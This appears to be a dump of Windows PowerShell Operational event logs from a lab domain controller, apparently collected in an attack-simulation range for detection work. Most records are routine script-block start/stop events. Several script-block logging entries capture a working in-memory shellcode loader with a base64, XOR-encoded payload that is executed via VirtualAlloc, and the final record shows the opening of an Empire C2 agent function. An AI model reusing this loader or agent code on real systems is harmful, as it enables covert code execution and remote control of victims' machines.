SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479389
Keywords=None
Message=Started invocation of ScriptBlock ID: 54af5a29-7a51-479b-852c-d2bba7e752fc
Runspace ID: 371b04eb-e0ff-4e83-bdd4-669a02c68000
06/15/2021 05:09:42 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479388
Keywords=None
Message=Completed invocation of ScriptBlock ID: 54af5a29-7a51-479b-852c-d2bba7e752fc
Runspace ID: 371b04eb-e0ff-4e83-bdd4-669a02c68000
06/15/2021 05:09:42 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479387
Keywords=None
Message=Started invocation of ScriptBlock ID: 54af5a29-7a51-479b-852c-d2bba7e752fc
Runspace ID: 371b04eb-e0ff-4e83-bdd4-669a02c68000
06/15/2021 05:09:42 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479386
Keywords=None
Message=Completed invocation of ScriptBlock ID: 54af5a29-7a51-479b-852c-d2bba7e752fc
Runspace ID: 371b04eb-e0ff-4e83-bdd4-669a02c68000
06/15/2021 05:09:42 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479385
Keywords=None
Message=Started invocation of ScriptBlock ID: 54af5a29-7a51-479b-852c-d2bba7e752fc
Runspace ID: 371b04eb-e0ff-4e83-bdd4-669a02c68000
06/15/2021 05:09:42 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479384
Keywords=None
Message=Completed invocation of ScriptBlock ID: 54af5a29-7a51-479b-852c-d2bba7e752fc
Runspace ID: 371b04eb-e0ff-4e83-bdd4-669a02c68000
06/15/2021 05:09:42 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479383
Keywords=None
Message=Started invocation of ScriptBlock ID: 54af5a29-7a51-479b-852c-d2bba7e752fc
Runspace ID: 371b04eb-e0ff-4e83-bdd4-669a02c68000
06/15/2021 05:09:42 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479382
Keywords=None
Message=Completed invocation of ScriptBlock ID: 54af5a29-7a51-479b-852c-d2bba7e752fc
Runspace ID: 371b04eb-e0ff-4e83-bdd4-669a02c68000
06/15/2021 05:09:42 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479381
Keywords=None
Message=Started invocation of ScriptBlock ID: 54af5a29-7a51-479b-852c-d2bba7e752fc
Runspace ID: 371b04eb-e0ff-4e83-bdd4-669a02c68000
06/15/2021 05:09:42 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479380
Keywords=None
Message=Completed invocation of ScriptBlock ID: 54af5a29-7a51-479b-852c-d2bba7e752fc
Runspace ID: 371b04eb-e0ff-4e83-bdd4-669a02c68000
06/15/2021 05:09:42 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479379
Keywords=None
Message=Started invocation of ScriptBlock ID: 54af5a29-7a51-479b-852c-d2bba7e752fc
Runspace ID: 371b04eb-e0ff-4e83-bdd4-669a02c68000
06/15/2021 05:09:42 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479378
Keywords=None
Message=Completed invocation of ScriptBlock ID: 54af5a29-7a51-479b-852c-d2bba7e752fc
Runspace ID: 371b04eb-e0ff-4e83-bdd4-669a02c68000
06/15/2021 05:09:42 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479377
Keywords=None
Message=Started invocation of ScriptBlock ID: 54af5a29-7a51-479b-852c-d2bba7e752fc
Runspace ID: 371b04eb-e0ff-4e83-bdd4-669a02c68000
06/15/2021 05:09:42 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479376
Keywords=None
Message=Completed invocation of ScriptBlock ID: 54af5a29-7a51-479b-852c-d2bba7e752fc
Runspace ID: 371b04eb-e0ff-4e83-bdd4-669a02c68000
06/15/2021 05:09:42 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479375
Keywords=None
Message=Started invocation of ScriptBlock ID: 54af5a29-7a51-479b-852c-d2bba7e752fc
Runspace ID: 371b04eb-e0ff-4e83-bdd4-669a02c68000
06/15/2021 05:09:42 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479374
Keywords=None
Message=Completed invocation of ScriptBlock ID: 54af5a29-7a51-479b-852c-d2bba7e752fc
Runspace ID: 371b04eb-e0ff-4e83-bdd4-669a02c68000
06/15/2021 05:09:42 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479373
Keywords=None
Message=Started invocation of ScriptBlock ID: 54af5a29-7a51-479b-852c-d2bba7e752fc
Runspace ID: 371b04eb-e0ff-4e83-bdd4-669a02c68000
06/15/2021 05:09:42 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479372
Keywords=None
Message=Completed invocation of ScriptBlock ID: 54af5a29-7a51-479b-852c-d2bba7e752fc
Runspace ID: 371b04eb-e0ff-4e83-bdd4-669a02c68000
06/15/2021 05:09:42 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479371
Keywords=None
Message=Started invocation of ScriptBlock ID: 54af5a29-7a51-479b-852c-d2bba7e752fc
Runspace ID: 371b04eb-e0ff-4e83-bdd4-669a02c68000
06/15/2021 05:09:42 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479370
Keywords=None
Message=Completed invocation of ScriptBlock ID: 54af5a29-7a51-479b-852c-d2bba7e752fc
Runspace ID: 371b04eb-e0ff-4e83-bdd4-669a02c68000
06/15/2021 05:09:42 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479369
Keywords=None
Message=Started invocation of ScriptBlock ID: 54af5a29-7a51-479b-852c-d2bba7e752fc
Runspace ID: 371b04eb-e0ff-4e83-bdd4-669a02c68000
06/15/2021 05:09:42 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479368
Keywords=None
Message=Completed invocation of ScriptBlock ID: 54af5a29-7a51-479b-852c-d2bba7e752fc
Runspace ID: 371b04eb-e0ff-4e83-bdd4-669a02c68000
06/15/2021 05:09:42 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479367
Keywords=None
Message=Started invocation of ScriptBlock ID: 54af5a29-7a51-479b-852c-d2bba7e752fc
Runspace ID: 371b04eb-e0ff-4e83-bdd4-669a02c68000
06/15/2021 05:09:42 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479366
Keywords=None
Message=Completed invocation of ScriptBlock ID: 54af5a29-7a51-479b-852c-d2bba7e752fc
Runspace ID: 371b04eb-e0ff-4e83-bdd4-669a02c68000
06/15/2021 05:09:42 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479365
Keywords=None
Message=Started invocation of ScriptBlock ID: 54af5a29-7a51-479b-852c-d2bba7e752fc
Runspace ID: 371b04eb-e0ff-4e83-bdd4-669a02c68000
06/15/2021 05:09:42 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1479364
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }

ScriptBlock ID: 54af5a29-7a51-479b-852c-d2bba7e752fc
Path:
06/15/2021 05:09:42 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479363
Keywords=None
Message=Started invocation of ScriptBlock ID: b8bb59f0-2a61-40c9-8c37-53741cfac6c1
Runspace ID: 371b04eb-e0ff-4e83-bdd4-669a02c68000
06/15/2021 05:09:42 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1479362
Keywords=None
Message=Creating Scriptblock text (1 of 1):
function func_get_proc_address {
	Param ($var_module, $var_procedure)		
	$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
	$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
	return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}

ScriptBlock ID: b8bb59f0-2a61-40c9-8c37-53741cfac6c1
Path:
06/15/2021 05:09:42 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479361
Keywords=None
Message=Started invocation of ScriptBlock ID: 54f3be2a-145e-4a2f-ae83-6736ebf18910
Runspace ID: 371b04eb-e0ff-4e83-bdd4-669a02c68000
06/15/2021 05:09:42 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=3
Type=Warning
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1479360
Keywords=None
Message=Creating Scriptblock text (1 of 1):
function func_get_proc_address {
	Param ($var_module, $var_procedure)		
	$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
	$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
	return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}

function func_get_delegate_type {
	Param (
		[Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
		[Parameter(Position = 1)] [Type] $var_return_type = [Void]
	)

	$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
	$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
	$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')

	return $var_type_builder.CreateType()
}

[Byte[]]$var_code = [System.Convert]::FromBase64String('38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qHEzqGEfIvOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwuIuQbw1bXIF7bGF4HVsF7qHsHIvBFqC9oqHs/IvCoJ6gi86pnBwd4eEJ6eXLcw3t8eagxyKV+S01GVyNLVEpNSndLb1QFJNz2yyMjIyMS3HR0dHR0Sxl1WoTc9sqHIyMjeBLqcnJJIHJyS5giIyNwc0t0qrzl3PZzyq8jIyN4EvFxSyMR46dxcXFwcXNLyHYNGNz2quWg4HNLoxAjI6rDSSdzSTx1S1ZlvaXc9nwS3HR0SdxwdUsOJTtY3Pam4yyn6SIjIxLcptVXJ6rayCpLiebBftz2quJLZgJ9Etz2Etx0SSRydXNLlHTDKNz2nCMMIyMa5FYke3PKWNzc3BLcyrIiIyPK6iIjI8tM3NzcDHNPFUkjFmwCcwZjYnN4F39zeXsWFwtzfQoUYGAKFF4HZmpgYnEOcHdibWdicWcOYm13anVqcXZwDndmcHcOZWpvZgIHawhrCSMWbAJzBiN2UEZRDmJERk1XGQNuTFlKT09CDBcNEwMLQExOU0JXSkFPRhgDbnBqZgMUDRMYA3RKTUdMVFADbXcDFg0SGAMNbWZ3A2BvcQMRDRMNFhMUERQYAw1tZncDYG9xAxANEw0TFxYTFQ0QEwouKSMWbAJzBmNic3gXf3N5exYXC3N9ChRgYAoUXgdmamBicQ5wd2JtZ2JxZw5ibXdqdWpxdnAOd2Zwdw5lam9mAgdrCGsJIxZsAnMGY2JzeBd/c3l7FhcLc30KFGBgChReB2ZqYGJxDnB3Ym1nYnFnDmJtd2p1anF2cA53ZnB3DmVqb2YCB2sIawkjFmwCcwZjYnN4F39zeXsWFwtzfQoUYGAKFF4HZmpgYnEOcHdibWdicWcOYm13anVqcXZwDndmcHcOZWojS9OWgXXc9kljSyMzIyNLIyNjI3RLe4dwxtz2sJojIyMjIvpycKrEdEsjAyMjcHVLMbWqwdz2puNX5agkIuCm41bGe+DLqt7c3E5GUUBLQk1HSllGDUBCV0lCTkVGUFcNQExOIyMjIyM=')

for ($x = 0; $x -lt $var_code.Count; $x++) {
	$var_code[$x] = $var_code[$x] -bxor 35
}

$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)

$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
$var_runme.Invoke([IntPtr]::Zero)

ScriptBlock ID: 54f3be2a-145e-4a2f-ae83-6736ebf18910
Path:
06/15/2021 05:09:42 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479359
Keywords=None
Message=Completed invocation of ScriptBlock ID: e8105a87-0fde-42b8-8988-48eac473204d
Runspace ID: 371b04eb-e0ff-4e83-bdd4-669a02c68000
06/15/2021 05:09:42 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479358
Keywords=None
Message=Started invocation of ScriptBlock ID: e8105a87-0fde-42b8-8988-48eac473204d
Runspace ID: 371b04eb-e0ff-4e83-bdd4-669a02c68000
06/15/2021 05:09:42 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479357
Keywords=None
Message=Completed invocation of ScriptBlock ID: 7f0e3bf3-ad0d-42de-9e83-d420640453ca
Runspace ID: 371b04eb-e0ff-4e83-bdd4-669a02c68000
06/15/2021 05:09:42 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479356
Keywords=None
Message=Started invocation of ScriptBlock ID: 7f0e3bf3-ad0d-42de-9e83-d420640453ca
Runspace ID: 371b04eb-e0ff-4e83-bdd4-669a02c68000
06/15/2021 05:09:42 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=12039
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=None
OpCode=To be used when operation is just executing a method
RecordNumber=1479355
Keywords=None
Message=Modifying activity Id and correlating
06/15/2021 05:09:42 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=8196
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=None
OpCode=To be used when operation is just executing a method
RecordNumber=1479354
Keywords=None
Message=Modifying activity Id and correlating
06/15/2021 05:09:42 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=8197
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Connect
OpCode=Open (async)
RecordNumber=1479353
Keywords=None
Message=Runspace state changed to Opened
06/15/2021 05:09:42 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=12039
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=None
OpCode=To be used when operation is just executing a method
RecordNumber=1479352
Keywords=None
Message=Modifying activity Id and correlating
06/15/2021 05:09:42 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=8196
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=None
OpCode=To be used when operation is just executing a method
RecordNumber=1479351
Keywords=None
Message=Modifying activity Id and correlating
06/15/2021 05:09:42 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=12039
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=None
OpCode=To be used when operation is just executing a method
RecordNumber=1479350
Keywords=None
Message=Modifying activity Id and correlating
06/15/2021 05:09:42 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=8196
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=None
OpCode=To be used when operation is just executing a method
RecordNumber=1479349
Keywords=None
Message=Modifying activity Id and correlating
06/15/2021 05:09:42 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=53504
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Named Pipe IPC
OpCode=Open (async)
RecordNumber=1479348
Keywords=None
Message=Windows PowerShell has started an IPC listening thread on process: 7788 in AppDomain: DefaultAppDomain.
06/15/2021 05:09:42 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=12039
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=None
OpCode=To be used when operation is just executing a method
RecordNumber=1479347
Keywords=None
Message=Modifying activity Id and correlating
06/15/2021 05:09:42 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=8196
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=None
OpCode=To be used when operation is just executing a method
RecordNumber=1479346
Keywords=None
Message=Modifying activity Id and correlating

06/09/2021 07:20:22 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=3
Type=Warning
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=138978
Keywords=None
Message=Creating Scriptblock text (1 of 3):
function Invoke-Empire {
    param(
        [Parameter(Mandatory=$true)]
        [String]
        $StagingKey,
        [Parameter(Mandatory=$true)]
        [String]
        $SessionKey,
        [Parameter(Mandatory=$true)]
        [String]
        $SessionID,
        [Int32]
        $AgentDelay = 5,
        [Double]
        $AgentJitter = 0.0,
        [String[]]
        $Servers,
        [String]
        $KillDate,
        [Int32]
        $KillDays,
        [String]
        $WorkingHours,
        [object]
        $ProxySettings,
        [String]
        $Profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
        [Int32]
        $LostLimit = 60,
        [String]
